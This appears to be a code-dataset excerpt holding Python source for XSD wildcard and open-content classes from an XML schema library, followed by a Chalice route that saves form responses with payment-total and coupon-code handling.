                and not self.has_occurs_restriction(other):
            return False
        elif not isinstance(other, type(self)):
            return False
        elif other.process_contents == 'strict' and self.process_contents != 'strict':
            return False
        elif other.process_contents == 'lax' and self.process_contents == 'skip':
            return False

        if not self.not_qname and not other.not_qname:
            pass
        elif '##defined' in other.not_qname and '##defined' not in self.not_qname:
            return False
        elif '##definedSibling' in other.not_qname and '##definedSibling' not in self.not_qname:
            return False
        elif other.not_qname:
            if not self.deny_qnames(x for x in other.not_qname if not x.startswith('##')):
                return False
        elif any(not other.is_namespace_allowed(get_namespace(x))
                 for x in self.not_qname if not x.startswith('##')):
            return False

        if self.not_namespace:
            if other.not_namespace:
                return all(ns in self.not_namespace for ns in other.not_namespace)
            elif '##any' in other.namespace:
                return True
            elif '##other' in other.namespace:
                return '' in self.not_namespace and other.target_namespace in self.not_namespace
            else:
                return False
        elif other.not_namespace:
            if '##any' in self.namespace:
                return False
            elif '##other' in self.namespace:
                return set(other.not_namespace).issubset({'', other.target_namespace})
            else:
                return all(ns not in other.not_namespace for ns in self.namespace)

        # Both constraints are positive namespace lists.
        if self.namespace == other.namespace:
            return True
        elif '##any' in other.namespace:
            return True
        elif '##any' in self.namespace or '##other' in self.namespace:
            return False
        elif '##other' in other.namespace:
            return other.target_namespace not in self.namespace and '' not in self.namespace
        else:
            return all(ns in other.namespace for ns in self.namespace)

    def union(self, other):
        """
        Update an XSD wildcard with the union of itself and another XSD wildcard.
        """
        # A name stays forbidden only if the other wildcard also forbids it,
        # either explicitly or through its namespace constraint.
        if not self.not_qname:
            self.not_qname = other.not_qname[:]
        else:
            self.not_qname = [
                x for x in self.not_qname
                if x in other.not_qname or not other.is_namespace_allowed(get_namespace(x))
            ]

        if self.not_namespace:
            if other.not_namespace:
                self.not_namespace = [ns for ns in self.not_namespace if ns in other.not_namespace]
            elif '##any' in other.namespace:
                self.not_namespace = []
                self.namespace = ['##any']
                return
            elif '##other' in other.namespace:
                not_namespace = ('', other.target_namespace)
                self.not_namespace = [ns for ns in self.not_namespace if ns in not_namespace]
            else:
                self.not_namespace = [ns for ns in self.not_namespace if ns not in other.namespace]

            if not self.not_namespace:
                self.namespace = ['##any']
            return
        elif other.not_namespace:
            if '##any' in self.namespace:
                return
            elif '##other' in self.namespace:
                not_namespace = ('', self.target_namespace)
                self.not_namespace = [ns for ns in other.not_namespace if ns in not_namespace]
            else:
                self.not_namespace = [ns for ns in other.not_namespace if ns not in self.namespace]

            self.namespace = ['##any'] if not self.not_namespace else []
            return

        # Both constraints are positive namespace lists.
        if '##any' in self.namespace or self.namespace == other.namespace:
            return
        elif '##any' in other.namespace:
            self.namespace = ['##any']
            return
        elif '##other' in other.namespace:
            w1, w2 = other, self
        elif '##other' in self.namespace:
            w1, w2 = self, other
        else:
            self.namespace.extend(ns for ns in other.namespace if ns not in self.namespace)
            return

        # Union of a '##other' wildcard (w1) with an explicit list (w2).
        if w1.target_namespace in w2.namespace and '' in w2.namespace:
            self.namespace = ['##any']
        elif '' not in w2.namespace and w1.target_namespace == w2.target_namespace:
            self.namespace = ['##other']
        elif self.xsd_version == '1.0':
            # XSD 1.0 has no notNamespace, so this union is not expressible.
            msg = "not expressible wildcard namespace union: {!r} V {!r}:"
            raise XMLSchemaValueError(msg.format(other.namespace, self.namespace))
        else:
            self.namespace = []
            self.not_namespace = ['', w1.target_namespace] if w1.target_namespace else ['']

    def intersection(self, other):
        """
        Update an XSD wildcard with the intersection of itself and another XSD wildcard.
        """
        # Forbidden names accumulate: a name is rejected if either side rejects it.
        if self.not_qname:
            self.not_qname.extend(x for x in other.not_qname if x not in self.not_qname)
        else:
            self.not_qname = [x for x in other.not_qname]

        if self.not_namespace:
            if other.not_namespace:
                self.not_namespace.extend(ns for ns in other.not_namespace
                                          if ns not in self.not_namespace)
            elif '##any' in other.namespace:
                pass
            elif '##other' not in other.namespace:
                self.namespace = [ns for ns in other.namespace if ns not in self.not_namespace]
                self.not_namespace = []
            else:
                if other.target_namespace not in self.not_namespace:
                    self.not_namespace.append(other.target_namespace)
                if '' not in self.not_namespace:
                    self.not_namespace.append('')
            return
        elif other.not_namespace:
            if '##any' in self.namespace:
                self.not_namespace = [ns for ns in other.not_namespace]
                self.namespace = []
            elif '##other' not in self.namespace:
                self.namespace = [ns for ns in self.namespace if ns not in other.not_namespace]
            else:
                self.not_namespace = [ns for ns in other.not_namespace]
                if self.target_namespace not in self.not_namespace:
                    self.not_namespace.append(self.target_namespace)
                if '' not in self.not_namespace:
                    self.not_namespace.append('')
                self.namespace = []
            return

        # Both constraints are positive namespace lists.
        if self.namespace == other.namespace:
            return
        elif '##any' in other.namespace:
            return
        elif '##any' in self.namespace:
            self.namespace = other.namespace[:]
        elif '##other' in self.namespace:
            self.namespace = [ns for ns in other.namespace if ns not in ('', self.target_namespace)]
        elif '##other' not in other.namespace:
            self.namespace = [ns for ns in self.namespace if ns in other.namespace]
        else:
            if other.target_namespace in self.namespace:
                self.namespace.remove(other.target_namespace)
            if '' in self.namespace:
                self.namespace.remove('')

    def iter_decode(self, source, validation='lax', **kwargs):
        # Implemented by concrete subclasses.
        raise NotImplementedError

    def iter_encode(self, obj, validation='lax', **kwargs):
        # Implemented by concrete subclasses.
        raise NotImplementedError
class XsdAnyElement(XsdWildcard, ParticleMixin, ElementPathMixin):
    """
    Class for XSD 1.0 *any* wildcards.

    .. <any
      id = ID
      maxOccurs = (nonNegativeInteger | unbounded) : 1
      minOccurs = nonNegativeInteger : 1
      namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace|##local)) ) : ##any
      processContents = (lax | skip | strict) : strict
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?)
    </any>
    """
    _ADMITTED_TAGS = {XSD_ANY}
    # XSD 1.1 wildcards can carry precedence constraints; always empty for XSD 1.0.
    precedences = ()
    def __init__(self, elem, schema, parent):
        super(XsdAnyElement, self).__init__(elem, schema, parent)
        # Initialize the XPath navigation mixin state explicitly (multiple inheritance).
        ElementPathMixin.__init__(self)
    def __repr__(self):
        # A wildcard has either a 'namespace' or a 'not_namespace' constraint; show the one in use.
        if self.namespace:
            return '%s(namespace=%r, process_contents=%r, occurs=%r)' % (
                self.__class__.__name__, self.namespace, self.process_contents, self.occurs
            )
        else:
            return '%s(not_namespace=%r, process_contents=%r, occurs=%r)' % (
                self.__class__.__name__, self.not_namespace, self.process_contents, self.occurs
            )
    @property
    def xpath_proxy(self):
        # Schema proxy object used by the XPath engine for this component.
        return XMLSchemaProxy(self.schema, self)
    def _parse(self):
        super(XsdAnyElement, self)._parse()
        # Parse minOccurs/maxOccurs from the XML element (provided by ParticleMixin).
        self._parse_particle(self.elem)
    def match(self, name, default_namespace=None, resolve=False, **kwargs):
        """
        Returns the element wildcard if name is matching the name provided
        as argument, `None` otherwise.

        :param name: a local or fully-qualified name.
        :param default_namespace: used when it's not `None` and not empty for \
        completing local name arguments.
        :param resolve: when `True` it doesn't return the wildcard but try to \
        resolve and return the element matching the name.
        :param kwargs: additional options used by XSD 1.1 xs:any wildcards.
        """
        if not self.is_matching(name, default_namespace, **kwargs):
            return
        elif not resolve:
            return self
        try:
            if name[0] != '{' and default_namespace:
                return self.maps.lookup_element('{%s}%s' % (default_namespace, name))
            else:
                return self.maps.lookup_element(name)
        except LookupError:
            # No matching global element: fall through and return None.
            pass
    def __iter__(self):
        # A wildcard has no concrete children; all iteration protocols yield nothing.
        return iter(())
    def iter(self, tag=None):
        return iter(())
    def iterchildren(self, tag=None):
        return iter(())
    @staticmethod
    def iter_substitutes():
        # Wildcards have no substitution group members.
        return iter(())
    def iter_decode(self, elem, validation='lax', **kwargs):
        """Decode *elem* against this wildcard, yielding decoded data and/or validation errors."""
        if not self.is_matching(elem.tag):
            if validation != 'skip':
                reason = "{!r} is not allowed here".format(elem)
                yield self.validation_error(validation, reason, elem, **kwargs)
        elif self.process_contents == 'skip':
            # processContents='skip': no decoding and no validation at all.
            return
        elif self.maps.load_namespace(get_namespace(elem.tag)):
            try:
                xsd_element = self.maps.lookup_element(elem.tag)
            except LookupError:
                if XSI_TYPE in elem.attrib:
                    # Unknown element but an xsi:type is provided: build a
                    # dummy element on the fly and decode through it.
                    xsd_element = self.schema.create_element(name=elem.tag)
                    yield from xsd_element.iter_decode(elem, validation, **kwargs)
                elif validation == 'skip' or self.process_contents == 'lax':
                    # Lax processing: decode with the generic anyType.
                    yield from self.any_type.iter_decode(elem, validation, **kwargs)
                else:
                    reason = "element %r not found." % elem.tag
                    yield self.validation_error(validation, reason, elem, **kwargs)
            else:
                yield from xsd_element.iter_decode(elem, validation, **kwargs)
        elif validation == 'skip':
            # Namespace could not be loaded: best-effort decode of the raw element.
            yield self.any_type.decode(elem) if len(elem) > 0 else elem.text
        elif self.process_contents == 'strict':
            reason = "unavailable namespace {!r}".format(get_namespace(elem.tag))
            yield self.validation_error(validation, reason, elem, **kwargs)
    def iter_encode(self, obj, validation='lax', **kwargs):
        """Encode the (name, value) pair *obj*, yielding encoded data and/or validation errors."""
        name, value = obj
        namespace = get_namespace(name)
        if not self.is_namespace_allowed(namespace):
            if validation != 'skip':
                reason = "element {!r} is not allowed here".format(name)
                yield self.validation_error(validation, reason, value, **kwargs)
        elif self.process_contents == 'skip':
            return
        elif self.maps.load_namespace(namespace):
            try:
                xsd_element = self.maps.lookup_element(name)
            except LookupError:
                if validation == 'skip' or self.process_contents == 'lax':
                    yield from self.any_type.iter_encode(obj, validation, **kwargs)
                elif self.process_contents == 'strict':
                    reason = "element %r not found." % name
                    yield self.validation_error(validation, reason, **kwargs)
            else:
                yield from xsd_element.iter_encode(value, validation, **kwargs)
        elif validation == 'skip':
            yield self.any_type.encode(value)
        elif self.process_contents == 'strict':
            reason = "unavailable namespace {!r}".format(namespace)
            yield self.validation_error(validation, reason, **kwargs)
    def is_overlap(self, other):
        """Return True if this wildcard's namespace constraint overlaps *other*'s."""
        if not isinstance(other, XsdAnyElement):
            # Delegate to the other component (e.g. an XsdElement) which knows
            # how to compare itself against a wildcard.
            return other.is_overlap(self)
        elif self.not_namespace:
            if other.not_namespace:
                return True
            elif '##any' in other.namespace:
                return True
            elif '##other' in other.namespace:
                return True
            else:
                return any(ns not in self.not_namespace for ns in other.namespace)
        elif other.not_namespace:
            if '##any' in self.namespace:
                return True
            elif '##other' in self.namespace:
                return True
            else:
                return any(ns not in other.not_namespace for ns in self.namespace)
        elif self.namespace == other.namespace:
            return True
        elif '##any' in self.namespace or '##any' in other.namespace:
            return True
        elif '##other' in self.namespace:
            # '##other' means any namespace except the (possibly absent) target namespace.
            return any(ns and ns != self.target_namespace for ns in other.namespace)
        elif '##other' in other.namespace:
            return any(ns and ns != other.target_namespace for ns in self.namespace)
        else:
            return any(ns in self.namespace for ns in other.namespace)
    def is_consistent(self, other):
        # XSD 1.0 wildcards impose no element consistency constraint.
        return True
class XsdAnyAttribute(XsdWildcard):
    """
    Class for XSD 1.0 *anyAttribute* wildcards.

    .. <anyAttribute
      id = ID
      namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
      processContents = (lax | skip | strict) : strict
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?)
    </anyAttribute>
    """
    _ADMITTED_TAGS = {XSD_ANY_ATTRIBUTE}
    def match(self, name, default_namespace=None, resolve=False, **kwargs):
        """
        Returns the attribute wildcard if name is matching the name provided
        as argument, `None` otherwise.

        :param name: a local or fully-qualified name.
        :param default_namespace: used when it's not `None` and not empty for \
        completing local name arguments.
        :param resolve: when `True` it doesn't return the wildcard but try to \
        resolve and return the attribute matching the name.
        :param kwargs: additional options that can be used by certain components.
        """
        if not self.is_matching(name, default_namespace, **kwargs):
            return
        elif not resolve:
            return self
        try:
            if name[0] != '{' and default_namespace:
                return self.maps.lookup_attribute('{%s}%s' % (default_namespace, name))
            else:
                return self.maps.lookup_attribute(name)
        except LookupError:
            # No matching global attribute: fall through and return None.
            pass
    def iter_decode(self, attribute, validation='lax', **kwargs):
        """Decode the (name, value) pair *attribute*, yielding the decoded value and/or errors."""
        name, value = attribute
        if not self.is_matching(name):
            if validation != 'skip':
                reason = "attribute %r not allowed." % name
                yield self.validation_error(validation, reason, attribute, **kwargs)
        elif self.process_contents == 'skip':
            # processContents='skip': neither decode nor validate.
            return
        elif self.maps.load_namespace(get_namespace(name)):
            try:
                xsd_attribute = self.maps.lookup_attribute(name)
            except LookupError:
                if validation == 'skip':
                    yield value
                elif self.process_contents == 'strict':
                    reason = "attribute %r not found." % name
                    yield self.validation_error(validation, reason, attribute, **kwargs)
            else:
                yield from xsd_attribute.iter_decode(value, validation, **kwargs)
        elif validation == 'skip':
            # Namespace unavailable: pass the raw value through.
            yield value
        elif self.process_contents == 'strict':
            reason = "unavailable namespace {!r}".format(get_namespace(name))
            yield self.validation_error(validation, reason, **kwargs)
    def iter_encode(self, attribute, validation='lax', **kwargs):
        """Encode the (name, value) pair *attribute*, yielding the encoded string and/or errors."""
        name, value = attribute
        namespace = get_namespace(name)
        if not self.is_namespace_allowed(namespace):
            if validation != 'skip':
                reason = "attribute %r not allowed." % name
                yield self.validation_error(validation, reason, attribute, **kwargs)
        elif self.process_contents == 'skip':
            return
        elif self.maps.load_namespace(namespace):
            try:
                xsd_attribute = self.maps.lookup_attribute(name)
            except LookupError:
                if validation == 'skip':
                    yield str(value)
                elif self.process_contents == 'strict':
                    reason = "attribute %r not found." % name
                    yield self.validation_error(validation, reason, attribute, **kwargs)
            else:
                yield from xsd_attribute.iter_encode(value, validation, **kwargs)
        elif validation == 'skip':
            yield str(value)
        elif self.process_contents == 'strict':
            reason = "unavailable namespace {!r}".format(get_namespace(name))
            yield self.validation_error(validation, reason, **kwargs)
class Xsd11AnyElement(XsdAnyElement):
    """
    Class for XSD 1.1 *any* declarations.

    .. <any
      id = ID
      maxOccurs = (nonNegativeInteger | unbounded) : 1
      minOccurs = nonNegativeInteger : 1
      namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
      notNamespace = List of (anyURI | (##targetNamespace | ##local))
      notQName = List of (QName | (##defined | ##definedSibling))
      processContents = (lax | skip | strict) : strict
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?)
    </any>
    """
    def _parse(self):
        super(Xsd11AnyElement, self)._parse()
        # Parse the XSD 1.1-only notNamespace/notQName constraints.
        self._parse_not_constraints()
    def is_matching(self, name, default_namespace=None, group=None, occurs=None):
        """
        Returns `True` if the component name is matching the name provided as argument,
        `False` otherwise. For XSD elements the matching is extended to substitutes.

        :param name: a local or fully-qualified name.
        :param default_namespace: used if it's not None and not empty for completing \
        the name argument in case it's a local name.
        :param group: used only by XSD 1.1 any element wildcards to verify siblings in \
        case of ##definedSibling value in notQName attribute.
        :param occurs: a Counter instance for verify model occurrences counting.
        """
        if name is None:
            return False
        elif not name or name[0] == '{':
            # Empty or already-expanded name: check its namespace directly.
            if not self.is_namespace_allowed(get_namespace(name)):
                return False
        elif default_namespace is None:
            # Local name without a default namespace: belongs to no namespace.
            if not self.is_namespace_allowed(''):
                return False
        else:
            # Local name completed with the default namespace; accept if either
            # the empty namespace or the default namespace is allowed.
            name = '{%s}%s' % (default_namespace, name)
            if not self.is_namespace_allowed('') \
                    and not self.is_namespace_allowed(default_namespace):
                return False
        if group in self.precedences:
            # Declared elements in the same group take precedence over this wildcard.
            if occurs is None:
                if any(e.is_matching(name) for e in self.precedences[group]):
                    return False
            elif any(e.is_matching(name) and not e.is_over(occurs[e])
                     for e in self.precedences[group]):
                return False
        # notQName constraints: ##defined excludes globally declared elements,
        # ##definedSibling excludes elements declared in the same model group.
        if '##defined' in self.not_qname and name in self.maps.elements:
            return False
        if group and '##definedSibling' in self.not_qname:
            if any(e.is_matching(name) for e in group.iter_elements()
                   if not isinstance(e, XsdAnyElement)):
                return False
        return name not in self.not_qname
    def is_consistent(self, other):
        """Element Declarations Consistent check against a matched element."""
        if isinstance(other, XsdAnyElement) or self.process_contents == 'skip':
            return True
        xsd_element = self.match(other.name, other.default_namespace, resolve=True)
        return xsd_element is None or other.is_consistent(xsd_element, strict=False)
    def add_precedence(self, other, group):
        """Register *other* as taking precedence over this wildcard within *group*."""
        if not self.precedences:
            # Shadow the class-level empty tuple with an instance-level dict.
            self.precedences = {}
        try:
            self.precedences[group].append(other)
        except KeyError:
            self.precedences[group] = [other]
class Xsd11AnyAttribute(XsdAnyAttribute):
    """
    Class for XSD 1.1 *anyAttribute* declarations.

    .. <anyAttribute
      id = ID
      namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
      notNamespace = List of (anyURI | (##targetNamespace | ##local))
      notQName = List of (QName | ##defined)
      processContents = (lax | skip | strict) : strict
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?)
    </anyAttribute>
    """
    inheritable = False  # Added for reduce checkings on XSD 1.1 attributes
    def _parse(self):
        super(Xsd11AnyAttribute, self)._parse()
        # Parse the XSD 1.1-only notNamespace/notQName constraints.
        self._parse_not_constraints()
    def is_matching(self, name, default_namespace=None, **kwargs):
        """Return True if *name* matches this wildcard, applying notQName exclusions."""
        if name is None:
            return False
        elif not name or name[0] == '{':
            # Empty or already-expanded name: extract its namespace.
            namespace = get_namespace(name)
        elif default_namespace is None:
            namespace = ''
        else:
            # Complete the local name with the default namespace.
            name = '{%s}%s' % (default_namespace, name)
            namespace = default_namespace
        # ##defined excludes attributes that have a global declaration.
        if '##defined' in self.not_qname and name in self.maps.attributes:
            return False
        return name not in self.not_qname and self.is_namespace_allowed(namespace)
class XsdOpenContent(XsdComponent):
    """
    Class for XSD 1.1 *openContent* model definitions.

    .. <openContent
      id = ID
      mode = (none | interleave | suffix) : interleave
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?), (any?)
    </openContent>
    """
    _ADMITTED_TAGS = {XSD_OPEN_CONTENT}
    mode = 'interleave'  # default per the XSD 1.1 spec
    any_element = None   # Xsd11AnyElement wrapping the <xs:any> child, when present
    def __init__(self, elem, schema, parent):
        super(XsdOpenContent, self).__init__(elem, schema, parent)
    def __repr__(self):
        return '%s(mode=%r)' % (self.__class__.__name__, self.mode)
    def _parse(self):
        super(XsdOpenContent, self)._parse()
        try:
            self.mode = self.elem.attrib['mode']
        except KeyError:
            # Keep the class-level default ('interleave').
            pass
        else:
            if self.mode not in {'none', 'interleave', 'suffix'}:
                self.parse_error("wrong value %r for 'mode' attribute." % self.mode)
        child = self._parse_child_component(self.elem)
        if self.mode == 'none':
            # mode='none' forbids an <xs:any> child.
            if child is not None and child.tag == XSD_ANY:
                self.parse_error("an openContent with mode='none' must not "
                                 "have an <xs:any> child declaration")
        elif child is None or child.tag != XSD_ANY:
            self.parse_error("an <xs:any> child declaration is required")
        else:
            # Wrap the child wildcard; open content is always optional and unbounded.
            any_element = Xsd11AnyElement(child, self.schema, self)
            any_element.min_occurs = 0
            any_element.max_occurs = None
            self.any_element = any_element
    @property
    def built(self):
        return True
    def is_restriction(self, other):
        """Return True if this open content is a valid restriction of *other*."""
        if other is None or other.mode == 'none':
            return self.mode == 'none'
        elif self.mode == 'interleave' and other.mode == 'suffix':
            # 'interleave' is broader than 'suffix', so it cannot restrict it.
            return False
        else:
            return self.any_element.is_restriction(other.any_element)
class XsdDefaultOpenContent(XsdOpenContent):
    """
    Class for XSD 1.1 *defaultOpenContent* model definitions.

    .. <defaultOpenContent
      appliesToEmpty = boolean : false
      id = ID
      mode = (interleave | suffix) : interleave
      {any attributes with non-schema namespace . . .}>
      Content: (annotation?, any)
    </defaultOpenContent>
    """
    _ADMITTED_TAGS = {XSD_DEFAULT_OPEN_CONTENT}
    applies_to_empty = False
    def __init__(self, elem, schema):
        # Deliberately skips XsdOpenContent.__init__ (which requires a parent):
        # defaultOpenContent is a direct schema child, so call the grandparent
        # initializer with only (elem, schema).
        super(XsdOpenContent, self).__init__(elem, schema)
    def _parse(self):
        super(XsdDefaultOpenContent, self)._parse()
        if self.parent is not None:
            self.parse_error("defaultOpenContent must be a child of the schema")
        if self.mode == 'none':
            self.parse_error("the attribute 'mode' of a defaultOpenContent cannot be 'none'")
        if self._parse_child_component(self.elem) is None:
            self.parse_error("a defaultOpenContent declaration cannot be empty")
        if self._parse_boolean_attribute('appliesToEmpty'):
            self.applies_to_empty = True
| 39.750602 | 100 | 0.584306 |
26f93630d42ef63602af907c558f741e42432d7d | 10,084 | py | Python | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | null | null | null | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | 1 | 2019-06-27T04:35:29.000Z | 2019-06-28T04:32:32.000Z | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | null | null | null | import uuid
from chalice import UnauthorizedError
import datetime
from pydash.objects import pick, get, unset
from ..util.formSubmit.util import calculate_price
from ..util.formSubmit.couponCodes import coupon_code_verify_max_and_record_as_used
from ..util.formSubmit.emailer import send_confirmation_email, fill_string_from_template
from ..util.formSubmit.ccavenue import update_ccavenue_hash
from ..util.formSubmit.paymentMethods import fill_paymentMethods_with_data
from ..util.responseUploadImages import process_response_data_images
from chalicelib.util.patch import patch_predicate
from chalicelib.util.counter import get_counter
from chalicelib.models import Form, Response, User, UpdateTrailItem, serialize_model
from bson.objectid import ObjectId
from pymodm.errors import DoesNotExist
def get_user_or_create_one(userId):
    """Return the User with the given id, creating and saving a new
    record first if none exists yet.
    """
    user = None
    try:
        user = User.objects.get({"_id": userId})
    except DoesNotExist:
        # First time this user is seen: persist a new record.
        user = User(id=userId)
        user.save()
    return user
def form_response_new(formId):
    """Create or update a form response.

    Payload:
    {
        "data": formData,
        "modifyLink": "...",
        "responseId"?: "asdsadasd"
    }
    If responseId is defined, it is an update.
    Otherwise, it is a new submission.
    """
    from ..main import app
    email_sent = False
    # A missing responseId means this is a brand new submission.
    responseId = app.current_request.json_body.get("responseId", None)
    if not responseId:
        responseId = ObjectId()
        newResponse = True
    else:
        responseId = ObjectId(responseId)
        newResponse = False
    form = Form.objects.get({"_id": ObjectId(formId)})
    response_data = app.current_request.json_body["data"]
    response_data = process_response_data_images(response_data)
    # Optionally apply configured JSON patches to the submitted data.
    postprocess = form.formOptions.postprocess
    if postprocess and "patches" in postprocess and type(postprocess["patches"]) is list:
        response_data = patch_predicate(response_data, postprocess["patches"])
    # Assign a sequential counter value to new responses when the feature is enabled.
    counter_value = None
    counter = form.formOptions.counter
    if newResponse and counter and "enabled" in counter and counter["enabled"] == True:
        counter_value = get_counter(formId)
    modify_link = app.current_request.json_body.get('modifyLink', '')
    paymentInfo = form.formOptions.paymentInfo
    confirmationEmailInfo = form.formOptions.confirmationEmailInfo
    paymentMethods = fill_paymentMethods_with_data(form.formOptions.paymentMethods, response_data)
    def calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo):
        """Evaluate one payment item's amount/quantity against the response data,
        add it to the running total and enforce the coupon-code usage maximum.
        Returns (True, {}) on success or (False, error_response) on failure.
        """
        paymentInfoItem['amount'] = calculate_price(paymentInfoItem.get('amount', '0'), response_data)
        paymentInfoItem['quantity'] = calculate_price(paymentInfoItem.get('quantity', '0'), response_data)
        paymentInfo['total'] += paymentInfoItem['amount'] * paymentInfoItem['quantity']
        if "couponCode" in paymentInfoItem and paymentInfoItem["amount"] * paymentInfoItem["quantity"] != 0:
            slots_maximum = calculate_price(paymentInfoItem.get("couponCodeMaximum", "-1"), response_data)
            if slots_maximum != -1:
                slots_requested = calculate_price(paymentInfoItem.get("couponCodeCount", "1"), response_data)
                slots_used = form.couponCodes_used.get(paymentInfoItem["couponCode"], 0)
                slots_available = slots_maximum - slots_used
                slots_remaining = slots_available - slots_requested
                if slots_remaining < 0:
                    message = "Coupon code maximum reached.\nSubmitting this form will cause you to exceed the coupon code maximum.\nNumber of spots remaining: {}".format(int(slots_available))
                    return False, {"res": {"success": False, "message": message, "fields_to_clear": ["couponCode"]}}
                # Record the usage both in memory and atomically in the database.
                form.couponCodes_used[paymentInfoItem["couponCode"]] = slots_used + slots_requested
                Form.objects.raw({"_id": form.id}).update({"$set": {f"couponCodes_used.{paymentInfoItem['couponCode']}": slots_used + slots_requested} })
        return True, {}
    paymentInfoItemsWithTotal = []
    paymentInfoItemsInstallment = []
    paymentInfo['total'] = 0
    for paymentInfoItem in paymentInfo.setdefault('items', []):
        paymentInfoItem.setdefault("name", "Payment Item")
        paymentInfoItem.setdefault("description", "Payment Item")
        paymentInfoItem.setdefault("quantity", "1")
        if paymentInfoItem.get("installment", False) == True:
            # Don't count "installment" payments towards the total.
            paymentInfoItemsInstallment.append(paymentInfoItem)
            continue
        if "$total" in paymentInfoItem.get("amount", "0") or "$total" in paymentInfoItem.get("quantity", "0"):
            # Depends on the grand total; evaluate after the first pass.
            paymentInfoItemsWithTotal.append(paymentInfoItem)
            continue
        success, error = calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo)
        if success is False:
            return error
    # Now take care of items for round off, etc. -- which need the total value to work.
    response_data["total"] = float(paymentInfo["total"])
    for paymentInfoItem in paymentInfoItemsWithTotal:
        success, error = calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo)
        if success is False:
            return error
    # Take care of installment payments now (evaluated but not added to the total).
    response_data["total"] = float(paymentInfo["total"])
    for paymentInfoItem in paymentInfoItemsInstallment:
        paymentInfoItem['amount'] = calculate_price(paymentInfoItem.get('amount', '0'), response_data)
        paymentInfoItem['quantity'] = calculate_price(paymentInfoItem.get('quantity', '0'), response_data)
    # "total" was only a temporary helper for price expressions; drop it.
    response_data.pop("total", None)
    paymentInfo['items'] = [item for item in paymentInfo['items'] if item['quantity'] * item['amount'] != 0]
    userId = app.get_current_user_id()
    paid = paymentInfo["total"] == 0
    if newResponse:
        response = Response(
            form=form,
            id=responseId,
            date_created=datetime.datetime.now(),
            modify_link=modify_link + "?responseId=" + str(responseId) if modify_link else "",
            counter=counter_value
        )
        # BUGFIX: was `userId is not "cm:cognitoUserPool:anonymousUser"` -- an
        # identity comparison against a string literal, whose result is
        # implementation-dependent. Use inequality for value comparison.
        if get(form, "formOptions.loginRequired", False) is True and userId != "cm:cognitoUserPool:anonymousUser":
            user = get_user_or_create_one(userId)
            response.user = userId
            # Only one response per user.
            try:
                Response.objects.get({"form": ObjectId(formId), "user": userId})
                raise Exception(f"Response with userId {userId} already exists!")
            except DoesNotExist:
                pass
    else:
        response = Response.objects.get({"_id": responseId})
        response.update_trail.append(UpdateTrailItem(
            old=response.value,
            new=response_data,
            date=datetime.datetime.now(),
            update_type="update"
        ))
        # An already-paid response stays paid only if the amount owed did not increase.
        if (response.paid == True and paymentInfo["total"] <= response.paymentInfo["total"]):
            paid = True
        if form.id != response.form.id:
            raise UnauthorizedError(f"Response {response.id} does not belong to form {form.id}; it belongs to form {response.form.id}.")
        if response.user and response.user.id != userId:
            app.check_permissions(form, 'Responses_Edit')
            # raise UnauthorizedError(f"User {userId} does not own response {response.id} (owner is {response.user.id})")
    if newResponse or (not newResponse and paid):
        response.value = response_data
        response.date_modified = datetime.datetime.now()
        response.paymentInfo = paymentInfo
        response.paid = paid
        if not newResponse:
            response.update_trail.append(UpdateTrailItem(date=datetime.datetime.now(), update_type="apply_update"))
        if paid and confirmationEmailInfo: # If total amount is zero (user uses coupon code to get for free)
            send_confirmation_email(response, confirmationEmailInfo)
            email_sent = True
        # todo: fix this, should auto_email come even if not paid?
        # BUGFIX: the original condition ended with `type(get(...) is dict)`,
        # i.e. type() applied to a bool -- always truthy -- and looked up the
        # camelCase key "autoEmail.confirmationEmailInfo" while the send call
        # below uses "auto_email.confirmationEmailInfo". Use isinstance on the
        # snake_case key actually used for sending.
        if "auto_email" in paymentMethods and get(paymentMethods, "auto_email.enabled", True) == True and isinstance(get(paymentMethods, "auto_email.confirmationEmailInfo"), dict):
            send_confirmation_email(response, get(paymentMethods, "auto_email.confirmationEmailInfo"))
            email_sent = True
        response.save()
        if "description" in paymentInfo and type(paymentInfo["description"]) is str:
            paymentInfo["description"] = fill_string_from_template(response, paymentInfo["description"])
        if "ccavenue" in paymentMethods and response.paid == False:
            paymentMethods["ccavenue"] = update_ccavenue_hash(formId, paymentMethods["ccavenue"], response)
        return {"res": {"value": response_data, "paid": paid, "success": True, "action": "insert", "email_sent": email_sent, "responseId": str(responseId), "paymentInfo": paymentInfo, "paymentMethods": paymentMethods } }
    elif not newResponse:
        # Update of an unpaid (or now-unpaid) response.
        response.date_modified = datetime.datetime.now()
        # Not using pending_update for now.
        # response.pending_update = {
        #     "value": response_data,
        #     "paymentInfo": paymentInfo,
        # }
        response.value = response_data
        response.paymentInfo = paymentInfo
        response.paid = paid
        response.save()
        if "description" in paymentInfo and type(paymentInfo["description"]) is str:
            paymentInfo["description"] = fill_string_from_template(response, paymentInfo["description"])
        if "ccavenue" in paymentMethods and response.paid == False:
            paymentMethods["ccavenue"] = update_ccavenue_hash(formId, paymentMethods["ccavenue"], response)
        return {"res": {"value": response_data, "paid": paid, "success": True, "action": "update", "email_sent": email_sent, "responseId": str(responseId), "paymentInfo": paymentInfo, "paymentMethods": paymentMethods, "amt_received": {"currency": paymentInfo["currency"], "total": float(response.amount_paid or 0) } } }
46c4855f6df95fbbec5222eea3afbf50e3893fde | 3,037 | py | Python | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
] | null | null | null | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
